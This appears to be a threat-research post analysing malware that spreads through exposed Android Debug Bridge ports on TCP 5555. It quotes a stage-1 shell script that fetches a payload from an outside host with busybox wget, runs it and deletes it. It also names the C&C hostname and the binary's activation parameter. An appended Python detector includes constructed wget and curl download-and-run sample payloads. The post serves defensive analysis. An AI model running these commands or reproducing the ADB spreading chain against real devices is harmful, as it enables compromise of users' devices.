The exploitation of open ports on devices has been an ongoing problem for many IoT users. TCP port 5555, in particular, has had issues in the past because product manufacturers left it open before shipping, which potentially exposes users to attackers. Recently, we found a new exploit using port 5555 after detecting two suspicious spikes in activity on July 9-10 and July 15. In this case the activity involves the command-line utility Android Debug Bridge (ADB), a part of the Android SDK that handles communication between devices and also allows developers to run and debug apps on Android devices.

Our data shows that the first wave of network traffic came mainly from China and the US, while the second wave primarily involved Korea.

Figure 1. Activity on TCP port 5555 from July 1 to July 15. Note the spike on July 9 and 10 and a second spike on July 15.

From our analysis of the network packets, we determined that the malware spreads by scanning for open ADB ports. It drops the stage 1 shell script over the ADB connection and launches it on the targeted system. This script downloads the two stage 2 shell scripts responsible for launching the stage 3 binary. It attacks ADB by uploading the payload via TCP port 5555.

Once it's dropped onto a device, the payload deletes itself from the disk and is renamed with a randomly selected name with an architecture string attached. The payload then downloads the shell script, which is removed after execution. The shell script for the July 9 activity can be seen below:

```sh
cd /dev/
busybox wget hxxp://9521562169/adbs -O - > adbs
sh adbs
rm adbs
```

Figure 2. ASCII and hex view of the malicious payload from the July 9 activity

In contrast, the payload for the July 15 activity downloads two scripts instead: the earlier "adbs" and a new script called "adbs2". As before, it removes them after execution.

Figure 3. ASCII and hex view of the malicious payload from the July 15 activity

The scripts download the next-stage binary for several architectures and launch the one matching the device. Both do the same thing but use different download methods: the first uses curl and the second uses the wget built into BusyBox. An example of the wget version can be seen below:

Figure 4. Code of the shell script that was downloaded via wget

The binary starts by deleting its own file from the filesystem. It then checks whether its own name is "./.f" and it was started with the parameter "yItDitb2HvayJvNc". If so, it uses the hostname "nukrainianhorseridingcom" to resolve the address of the C&C server through the Google DNS server.
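As an added defender-side illustration (not code from the original analysis), the stage 1 download-execute-delete pattern described above can be flagged heuristically in ADB shell payloads captured from port 5555 sessions, and the payload URL extracted for blocking. The sample payloads and the EXAMPLE-HOST placeholder are constructed, not indicators from the campaign.

```python
import re
from dataclasses import dataclass, field

# Constructed sample ADB shell payloads (not captures from the original
# analysis): the first mirrors the July 9 stage-1 script quoted above, the
# second the curl variant the text mentions; EXAMPLE-HOST is a placeholder.
SAMPLES = {
    "july9_wget": "cd /dev/; busybox wget hxxp://EXAMPLE-HOST/adbs -O - > adbs; sh adbs; rm adbs",
    "curl_variant": "cd /dev/ && curl -s hxxp://EXAMPLE-HOST/adbs2 -o adbs2 && sh adbs2 && rm -f adbs2",
    "benign": "pm list packages; getprop ro.build.version.release",
}
URL_RE = re.compile(r"h[tx]{2}ps?://\S+")      # also matches defanged hxxp:// URLs
DOWNLOADER_RE = re.compile(r"\b(wget|curl)\b")

@dataclass
class Verdict:
    suspicious: bool
    dropped: list = field(default_factory=list)   # files downloaded and then executed
    urls: list = field(default_factory=list)      # payload URLs, usable as IoCs
    signals: list = field(default_factory=list)   # human-readable reasons

def split_commands(payload: str) -> list:
    # One-line payloads chain commands with ";", "&&" or "||"; multi-line ones use newlines.
    return [c.strip() for c in re.split(r"[;\n]|&&|\|\|", payload) if c.strip()]

def output_name(cmd: str, url: str) -> str:
    m = (re.search(r"-[Oo]\s*-\s*>\s*(\S+)", cmd)   # wget ... -O - > name (as in the July 9 script)
         or re.search(r"-[Oo]\s+(\S+)", cmd)          # wget -O name / curl -o name
         or re.search(r">\s*(\S+)", cmd))             # plain shell redirection
    return m.group(1) if m else url.rsplit("/", 1)[-1]  # default: last path component of the URL

def analyze(payload: str) -> Verdict:
    downloaded, executed, removed, urls, signals = {}, set(), set(), [], []
    for cmd in split_commands(payload):
        if re.fullmatch(r"cd\s+/dev/?", cmd):
            signals.append("stages files in /dev")
        elif DOWNLOADER_RE.search(cmd) and (u := URL_RE.search(cmd)):
            urls.append(u.group(0))
            downloaded[output_name(cmd, u.group(0))] = u.group(0)
        elif m := re.fullmatch(r"(?:sh|bash)\s+(\S+)|\./(\S+)", cmd):
            executed.add(m.group(1) or m.group(2))
        elif m := re.fullmatch(r"rm\s+(?:-\S+\s+)*(\S+)", cmd):
            removed.add(m.group(1))
    dropped = [name for name in downloaded if name in executed]  # the download-then-execute link
    if dropped:
        signals.append("executes a file it just downloaded")
    if any(name in removed for name in dropped):
        signals.append("deletes the dropped file after execution")
    return Verdict(bool(dropped), dropped, urls, signals)
```

A plain wget or curl that is never executed, or an `adb shell` session that only queries the device, yields no verdict, so the heuristic keys on the chained drop-run-delete behaviour rather than on any single command.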